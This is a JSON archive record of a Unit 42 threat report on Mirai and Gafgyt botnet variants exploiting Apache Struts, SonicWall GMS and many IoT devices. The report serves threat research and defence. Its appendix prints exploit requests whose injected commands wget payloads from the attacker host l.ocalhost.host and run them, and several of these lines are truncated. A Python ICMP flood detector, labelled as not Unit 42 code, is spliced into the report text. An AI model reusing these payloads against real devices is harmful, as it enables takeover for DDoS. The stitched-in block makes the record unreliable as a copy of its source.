{
	"id": "0b31accc-1425-4dfd-9aa7-404d77386b60",
	"created_at": "2026-04-06T00:09:04.147655Z",
	"updated_at": "2026-04-10T03:20:35.981983Z",
	"deleted_at": null,
	"sha1_hash": "4e76b27106703199ec880e1d3c781de6e6b8ea21",
	"title": "Multi-exploit IoT/Linux Botnets Mirai and Gafgyt Target Apache Struts, SonicWall",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 336101,
	"plain_text": "Multi-exploit IoT/Linux Botnets Mirai and Gafgyt Target Apache Struts,\r\nSonicWall\r\nBy Ruchna Nigam\r\nPublished: 2018-09-10 · Archived: 2026-04-05 21:26:53 UTC\r\nExecutive Summary:\r\nUnit 42 has uncovered new variants of the well-known IoT botnets Mirai and Gafgyt. These are the IoT botnets associated\r\nwith unprecedented Distributed Denial of Service attacks in November 2016 and since.\r\nThese variants are notable for two reasons:\r\nThe new Mirai version targets the same Apache Struts vulnerability associated with the Equifax data breach in 2017.\r\nThe new Gafgyt version targets a newly disclosed vulnerability affecting older, unsupported versions of SonicWall’s\r\nGlobal Management System (GMS).\r\nThese developments suggest these IOT botnets are increasingly targeting enterprise devices with outdated versions.\r\nAll organizations should ensure they keep not only their systems up-to-date and patched, but also their IoT devices. For Palo\r\nAlto Networks customers, WidlFire detects all related samples with malicious verdicts. Additional protections are noted in\r\nthe conclusion below.\r\nResearch:\r\nOn September 7, 2018, Unit 42 found samples of a Mirai variant that incorporates exploits targeting 16 separate\r\nvulnerabilities. While the use of multiple exploits within a single sample of Mirai has been observed in the past, this is the\r\nfirst known instance of Mirai targeting a vulnerability in Apache Struts.\r\nIn addition, Unit 42 found the domain that is currently hosting these Mirai samples previously resolved to a different IP\r\naddress during the month of August. During that time this IP was intermittently hosting samples of Gafgyt that incorporated\r\nan exploit against CVE-2018-9866 a SonicWall vulnerability affecting older versions of SonicWall Global Management\r\nSystem (GMS). 
SonicWall has been notified of this development.\r\nThe incorporation of exploits targeting Apache Struts and SonicWall by these IoT/Linux botnets could indicate a larger\r\nmovement from consumer device targets to enterprise targets.\r\nApache Struts exploit in multi-exploit Mirai variant\r\nThe exploit targeting Apache Struts in the new variant we found targets CVE-2017-5638, an arbitrary command execution\r\nvulnerability via crafted Content-Type, Content-Disposition, or Content-Length HTTP headers. Its format can be seen in\r\nFigure 1, with the payload highlighted.\r\nFigure 1 CVE-2017-5638 exploit format\r\nThe other 15 exploits incorporated in this Mirai variant are detailed in Table 2 in the Appendix below.\r\nWhile these samples are variants of Mirai, they don’t include the bruteforce functionality generally used by Mirai. They use\r\nl[.]ocalhost[.]host:47883 as C2, and the same string encryption (XOR obfuscation) scheme as Mirai, with the key 0xdeadf00d.\r\nSonicWall GMS exploit in Gafgyt variant\r\nThe domain l[.]ocalhost[.]host, used for C2 and to serve payloads in the Mirai variant discussed above, has also been found\r\nassociated with other Mirai activity in the past, as far back as November 2016.\r\nFor part of the month of August 2018, that same domain resolved to a different IP address, 185[.]10[.]68[.]127. At that time\r\nwe found that IP hosting samples of Gafgyt containing an exploit for a recently disclosed SonicWall vulnerability (CVE-2018-9866) affecting older, unsupported versions of SonicWall Global Management System (GMS) (8.1 and older) that is\r\nnot present in currently supported versions.\r\nThe vulnerability CVE-2018-9866 targeted by the exploit stems from the lack of sanitization of XML-RPC requests to the\r\nset_time_config method. 
Figure 2 shows the exploit used in the sample, with the payload highlighted.\r\nFigure 2 SonicWall set_time_config RCE format\r\nThese samples first surfaced on August 5, less than a week after the publication of a Metasploit module for this vulnerability.\r\nSonicWall published its public advisory on the issue on July 17, 2018.\r\nThe samples we found are built using the Gafgyt codebase rather than Mirai. Some of the commands supported are\r\ndescribed in Table 3 below.\r\nTable 3 Some commands supported by variant with SonicWall exploit\r\nCommand: !* SCANNER \u003cHUAWEI/GPON/DLINK/SONICWALL/OFF\u003e\r\nDescription: Based on the argument provided, the bot starts sending the associated exploit to devices.\r\n·      HUAWEI: Send CVE-2017-17215 (see previous campaigns)\r\n·      GPON: Send the Dasan GPON exploits CVE-2018-10561/CVE-2018-10562 (see Table 2)\r\n·      DLINK: Send D-Link DSL-2750B OS Command Injection (see Table 2)\r\n·      SONICWALL: Send the exploit in Figure 2\r\n·      OFF: kill the running process associated with the bot\r\nCommand: !* BIN_UPDATE \u003cHTTP_SERVER\u003e \u003cFILE_LOCATION\u003e\r\nDescription: Fetches an update from \u003cHTTP_SERVER\u003e, saves it to \u003cFILE_LOCATION\u003e, and installs the update.\r\nCommand: !* BN \u003cIP\u003e \u003cPORT\u003e \u003cTIME\u003e\r\nDescription: Launch a Blacknurse DDoS attack against \u003cIP\u003e:\u003cPORT\u003e for a duration of \u003cTIME\u003e seconds.\r\nBlacknurse is a low-bandwidth DDoS attack involving ICMP Type 3 Code 3 (destination unreachable, port unreachable) packets that cause high CPU load on the target; it was first\r\ndiscovered in November 2016. 
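The detection side of the Blacknurse method just described, as an added example that is not code from the post or from the bot: Blacknurse needs little bandwidth but a sustained rate of ICMP Type 3 Code 3 packets, so the useful signal is packets per second per source rather than bytes. The sliding-window counter below flags any source whose Type 3 Code 3 rate crosses a threshold. The packet records are constructed, and the threshold is a parameter to tune to the capacity of the firewall in front of you, not a figure taken from the page.

```python
# Added example (not Unit 42 code): flag Blacknurse-style ICMP floods from
# a stream of (timestamp, source, icmp_type, icmp_code) records.
from collections import deque

ICMP_DEST_UNREACH = 3   # ICMP type 3: destination unreachable
ICMP_PORT_UNREACH = 3   # code 3: port unreachable (the Blacknurse packet)

def blacknurse_sources(packets, window=1.0, threshold=1000):
    # packets: iterable of (timestamp_seconds, src_ip, icmp_type, icmp_code)
    # returns {src_ip: timestamp at which that source first crossed the
    # threshold of Type 3 Code 3 packets inside a sliding window}
    recent = {}   # src_ip -> deque of timestamps inside the window
    flagged = {}
    for ts, src, itype, icode in sorted(packets):
        if (itype, icode) != (ICMP_DEST_UNREACH, ICMP_PORT_UNREACH):
            continue            # echo requests etc. are not the signal
        q = recent.setdefault(src, deque())
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()         # drop timestamps that fell out of the window
        if len(q) >= threshold and src not in flagged:
            flagged[src] = ts
    return flagged

def sample_packets():
    # constructed traffic: one source sends 2000 port-unreachable packets in
    # half a second, a second host sends a handful, a third only pings
    pkts = [(i * 0.00025, '198.51.100.7', 3, 3) for i in range(2000)]
    pkts += [(i * 0.1, '203.0.113.9', 3, 3) for i in range(5)]
    pkts += [(i * 0.01, '192.0.2.44', 8, 0) for i in range(300)]
    return pkts

if __name__ == '__main__':
    print(blacknurse_sources(sample_packets()))
```

Because the threshold is per source, a distributed flood from many bots each staying under it will not trip this check; pair it with an aggregate Type 3 Code 3 rate per destination if that is the case you care about.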
The earliest samples we have seen supporting the Blacknurse method are from September 2017.\r\nConclusion\r\nThe incorporation of exploits targeting Apache Struts and SonicWall by these IoT/Linux botnets could be an indication of a\r\nlarger movement from consumer device targets to enterprise targets.\r\nPalo Alto Networks AutoFocus customers can track these activities using individual exploit tags:\r\nCVE-2017-5638\r\nCVE-2018-9866\r\nEnGeniusRCE\r\nCVE-2017-6884\r\nDLinkDSL2750BOSCmdInjection\r\nGPONExploits\r\nCVE-2017-17215\r\nDLinkcommandphpRCE\r\nDLinkOSInjection\r\nNetgearRCE\r\nVacronNVRRCE\r\nAutoFocus customers can also use the following malware family tags:\r\nGafygt\r\nELFMirai\r\nWildFire detects all related samples with malicious verdicts.\r\nAppendix\r\nHere is a list of the other vulnerabilities targeted in the Mirai variant that targets Apache Struts (Table 2; each entry gives the vulnerability, the affected devices, and the exploit format):\r\nCVE-2017-5638\r\nAffected devices: devices with unpatched Apache Struts\r\nExploit format: see Figure 1\r\nLinksys RCE\r\nAffected devices: Linksys E-series devices\r\nExploit format:\r\nPOST /tmBlock.cgi HTTP/1.1\r\nAuthorization: Basic YWRtaW46cG9ybmh1Yg==\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 215\r\nsubmit_button=\u0026change_action=\u0026action=\u0026commit=0\u0026ttcp_num=2\u0026ttcp_size=2\u0026ttcp_ip=-h `wge\r\n%3E%20/tmp/nemp;sh%20/tmp/nemp`\u0026StartEPI=1\r\nThe samples contain other versions of the same exploit using GET and POST requests, aimed at\r\n/tmBlock.cgi, /tmUnblock.cgi, /hndBlock.cgi and /hndUnblock.cgi\r\nVacron NVR RCE\r\nAffected devices: Vacron NVR devices\r\nExploit format: similar to previous campaigns. This variant also contains a POST request version of the same exploit:\r\nPOST /board.cgi HTTP/1.1\r\nContent-Length: 118\r\nContent-Type: application/x-www-form-urlencoded\r\ncmd=`wget%20http://l.ocalhost.host/vac.sh%20-O%20-%3E%20/tmp/nemp;sh%20/tmp/nemp`\r\nD-Link command.php RCE\r\nAffected devices: some D-Link devices\r\nExploit format:\r\nPOST /command.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nContent-Length: 127\r\ncmd=`wget%20http://l.ocalhost.host/cmdphp.sh%20-O%20-%3E%20/tmp/nemp;sh%20/tmp/nem\r\nCCTV/DVR RCE\r\nAffected devices: CCTVs and DVRs from over 70 vendors\r\nExploit format: similar to previous campaigns.\r\nEnGenius RCE\r\nAffected devices: EnGenius EnShare IoT Gigabit Cloud Service 1.4.11\r\nExploit format:\r\nPOST /web/cgi-bin/usbinteract.cgi HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 133\r\naction=7\u0026path=\"|wget%20http://l.ocalhost.host/usb.sh%20-O%20-%3E%20/tmp/nemp;sh%20/tm\r\nAVTECH Unauthenticated Command Injection\r\nAffected devices: AVTECH IP Camera/NVR/DVR devices\r\nExploit format:\r\nGET /cgi-bin/nobody/Search.cgi?\r\naction=cgi_query\u0026ip=google.com\u0026port=80\u0026queryb64str=LW==\u0026username=admin%20;XmlAp%2\r\nO%20-%3E%20/tmp/nemp;sh%20/tmp/nemp);\u0026password=admin\r\nContent-Type: application/x-www-form-urlencoded\r\nCVE-2017-6884\r\nAffected devices: Zyxel routers\r\nExploit format:\r\nGET /cgi-bin/luci/;stok=\u003cClipped\u003e/expert/maintenance/diagnostic/nslookup?\r\nnslookup_button=nslookup_button\u0026ping_ip=google.ca%3b%20`wget%20http://l.ocalhost.host/luci.\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nReferer: http://192.168.0.1/cgi-bin/luci/;stok=\u003cClipped\u003e/expert/maintenance/diagnostic/nslookup\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: csd=9; sysauth=\u003cClipped\u003e\r\nConnection: close\r\nNetGain ‘ping’ Command Injection\r\nAffected devices: NetGain Enterprise Manager 7.2.562\r\nExploit format:\r\nPOST /u/jsp/tools/exec.jsp HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nCookie: JSESSIONID=542B58462355E4E3B99FAA42842E62FF\r\nConnection: close\r\nPragma: no-cache\r\nCache-Control: no-cache\r\nContent-Length: 206\r\ncommand=cmd+%2Fc+ping\u0026argument=127.0.0.1+%7C+`wget%20http://l.ocalhost.host/exec.sh%2\r\n%3E%20/tmp/nemp;sh%20/tmp/nemp`\u0026async_output=ping1487856455258\u0026isWindows=false\r\nNUUO OS Command Injection\r\nAffected devices: NUUO NVRmini 2 3.0.8\r\nExploit format:\r\nPOST /handle_iscsi.php HTTP/1.1\r\nX-Requested-With: XMLHttpRequest\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: PHPSESSID=c9fdced9e8129eb4c14e3154cd0e0ce3; lang=en; loginName=admin\r\nConnection: close\r\nContent-Length: x\r\nact=discover\u0026address=1.3.3.7|`wget%20http://l.ocalhost.host/iscsi.sh%20-O%20-%3E%20/tmp/n\r\nNUUO OS Command Injection\r\nAffected devices: NUUO NVRmini 2 3.0.8\r\nExploit format:\r\nPOST /cgi-bin/cgi_system?cmd=saveconfig HTTP/1.1\r\nCache-Control: max-age=0\r\nContent-Length: 187\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: PHPSESSID=3bc601000ea8f085c22cb37b9b102b7f; lang=en\r\nConnection: close\r\nbfolder=%2Fmtd%2Fblock3\u0026bfile=|`wget%20http://l.ocalhost.host/cgisys.sh%20-O%20-%3E%20\r\nNetgear setup.cgi unauthenticated RCE\r\nAffected devices: DGN1000 Netgear routers\r\nExploit format: similar to previous campaigns.\r\nHNAP SoapAction-Header Command Execution\r\nAffected devices: D-Link devices\r\nExploit format: similar to previous campaigns, with the SoapAction header value http://purenetworks[.]com/HNAP1/GetDeviceSettings/. This variant uses a working version of the exploit as opposed to the faulty one used in the campaigns linked.\r\nD-Link OS Command Injection\r\nAffected devices: D-Link DSL-2750B\r\nExploit format: similar to previous campaigns.\r\nJAWS Webserver authenticated shell command execution\r\nAffected devices: MVPower DVRs, among others\r\nExploit format: similar to previous campaigns.\r\nCVE-2018-10561, CVE-2018-10562\r\nAffected devices: Dasan GPON routers\r\nExploit format: similar to previous campaigns. This variant also includes a POST request version of the same exploit.\r\nTable 2 Other exploits used in the same sample\r\nIndicators of Compromise\r\nSamples with Apache Struts exploit 
CVE-2017-5638\r\nd6648a36f55d6b8ffd034df7d04156d31411719ce9bc28e6d30c8427feacb397\r\n710d56a90b5f61c7ae82fcf305d23d48476e4f237ffff9d68b961171f168f255\r\n52274c46933c20aaf64fd4c11557143fcfdc76eef192743fafd1b3a8bed3f4d2\r\n078eef70d754e9b64bc783f085846a2e8ae419653a79ed2386c4ade86fde68cb\r\nef090093496ccdab506848166a07554bfa74eb98a0546171b84fc73861f67c79\r\n49cdb537f5e4081362545532a623f597212c8cea847cf9f2b2f1fe1f3cd0ec2f\r\n99c22a0c0e252ab123fb3167f49d94dc12960b79565ca6dfd28f2ff5b0346348\r\nae2354a5d8b84fb6ea6fc4b9ca3060959d5c0c77684cd2100731df2a3c7a204e\r\n1913cf8e65114136cc309e72c384b717f0aeaaeae0c040188648c4afebce1669\r\nSamples with SonicWall GMS exploit CVE-2018-9866\r\n1814c010f5e7391c7ea38850f9caf0771866e315f8d0c58c563818e71d30c208\r\n29540468514cd48b6c2571722018dffb49d12f99c95b248a44a1455fff01acfb\r\n39891a1c13e4e6ec9de410201f697d23c05e83a29ec0010c6c62c6829386e6a6\r\n596270e91ccee3ec04a552bafde586af127ecac7141852edb9707ac6c4779a99\r\n68b27935c7d064478339f7d95b57ff06ffa1efbd81009b4a2870c5cf3e0b0b35\r\n92a4c6ae034c3a03c21b74bdc00264192e60a85deedd90b99a3e350758eb85c1\r\naab0ec600cdf57f28f9480ff3a9d3547f699af005c015b74c5c9e39a992570b6\r\nd8fbf6d68993045b4840729c788665ab10c50c42b27246a290031664f3b956eb\r\ndafe1b513183902692c8ba8b2a95fede7c13937e49bf21294de448df05edff18\r\nf89d742c4d3312ac9bd707a9135235482c554e369cb646dcd97f6a14b4210136\r\nfab034d705b3ad7a10101858daf5da93a88f8bfd509dee9b8072678b27290ed3\r\nInfrastructure\r\nl[.]ocalhost[.]host\r\n185[.]10[.]68[.]213\r\n185[.]10[.]68[.]127\r\nSource: https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/"
	],
	"report_names": [
		"unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall"
	],
	"threat_actors": [],
	"ts_created_at": 1775434144,
	"ts_updated_at": 1775791235,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4e76b27106703199ec880e1d3c781de6e6b8ea21.pdf",
		"text": "https://archive.orkl.eu/4e76b27106703199ec880e1d3c781de6e6b8ea21.txt",
		"img": "https://archive.orkl.eu/4e76b27106703199ec880e1d3c781de6e6b8ea21.jpg"
	}
}